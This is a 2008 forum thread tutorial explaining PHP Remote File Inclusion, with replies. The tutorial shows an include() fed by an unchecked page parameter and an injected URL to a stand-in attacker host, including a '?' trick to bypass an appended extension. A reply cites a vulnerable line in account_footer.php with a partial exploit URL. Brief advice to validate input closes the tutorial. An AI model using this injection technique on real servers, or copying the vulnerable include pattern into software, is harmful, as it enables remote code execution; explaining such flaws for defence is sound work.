Go4Expert (http://www.go4expert.com/)
-   Ethical hacking Tips (http://www.go4expert.com/articles/ethical-hacking-tutorials/)
-   -   Basic Remote File Inclusion (RFI) (http://www.go4expert.com/articles/basic-remote-file-inclusion-rfi-t11836/)

XXxxImmortalxxXX 4Jul2008 13:09

Basic Remote File Inclusion (RFI)


Remote file inclusion, commonly known as RFI is a form of attack where the attacker trys to inject there own php code inside your php app's. If an attacker can successfully achieve this they will be able to execute any code they wish on your webserver.


Lets say we have a website that is coded in php, the website uses something like page=page.html to work out which page should be displayed. The code for this might look like

  $file =$_GET['page']; //The page we wish to display

hat this means is that what ever is passed down to page will get included inside this php page. This means that an attacker can simply do something like this


If we take a look at what is happening on the code side of things once this has been done we can see that the actual code that the web server is executing looks like this

  $file ="http://www.attackersserver.com/my_evil_script.txt?"; //$_GET['page'];
  include($file); //$file is the attackers script

As you can see the attacker has just managed to get his code executed on your webserver.

Behind The Scenes

So why can an attacker do this? Well the simple answer is because the include() function (note, this kind of attack isnt only open to the include function, require_once() will also work) allows you to link to remote files, the problem with this is that an attacker can take advantage of that feature, like you just seen. You might be wondering why the script that the attacker includes is a .txt and not a .php. The answer to this is that if the script was a .php and the attackers server had php installed then the script will get executed on the attackers server and not the target. We also add the ? at the end so we can remove anything that might be inside the include() function on the target server, take this script for example


  $file =$_GET['page'];
  include($file .".php");

What the above script does is add .php to anything that is passed into it. So if we passed it http://www.attackersserver.com/my_evil_script.txt then what we are actually going to see in the include() function is http://www.attackersserver.com/my_evil_script.txt.php this is bad. What this means is that we wont actually get our script executed as it doesnt exist now. So if we pass the ? on the end of the script we are going to treat the .php as if it is a var that is getting passed to the script. So now the include() function looks like http://www.attackersserver.com/my_evil_script.txt?.php and it will still get executed.


There you have it a basic tutorial on what remote file inclusion is and how/why an attacker can use it against your servers. This kind of attack, just like most attacks isnt that hard to stop if you dont trust all data that is coming into you. All you have to really remember is if the data isnt hard coded then you need to check it to make sure it does what it is meant to do. Alot of the attacks that are preformed can be stoped by a few simple checks on the data.


Need help ask a question

rider 10Jul2008 22:59

Re: Basic Remote File Inclusion (RFI)
nice example but you have listed only a small one ... i will show you something else: this is the vulnerability of a php file called account_footer.php.
require_once( $sl_theme_unix_path."/account/footer.php" );
for this we will have : http://site.com/path_to_script/accou...eme_unix_path= .. but i think that you allready know that. The worst part of this is that the "hackers" who think that if they are deleting the vulnerable file will result in a secured server ... they dont know that is just a question of days until the are discovered.

XXxxImmortalxxXX 10Jul2008 23:28

Re: Basic Remote File Inclusion (RFI)

rider 11Jul2008 13:00

Re: Basic Remote File Inclusion (RFI)
You welcome :) soon i`l write a tutorial about this .. maybe some people will read it so this will make them think first of deleting files from server.

hanleyhansen 16Jul2008 03:06

Re: Basic Remote File Inclusion (RFI)
What will be a possible solution say if your index.php refers to hundreds of files? Would you have to hardcode each one in?

XXxxImmortalxxXX 16Jul2008 08:44

Re: Basic Remote File Inclusion (RFI)
what do u mean like index.php=(other files)?

hanleyhansen 16Jul2008 21:56

Re: Basic Remote File Inclusion (RFI)
What I mean is that since you said that the best security measure would be to hard code all the data in. What if its a lot of data? Is there another solution instead of hard coding hundreds of pages of data?

All times are GMT +5.5. The time now is 10:30.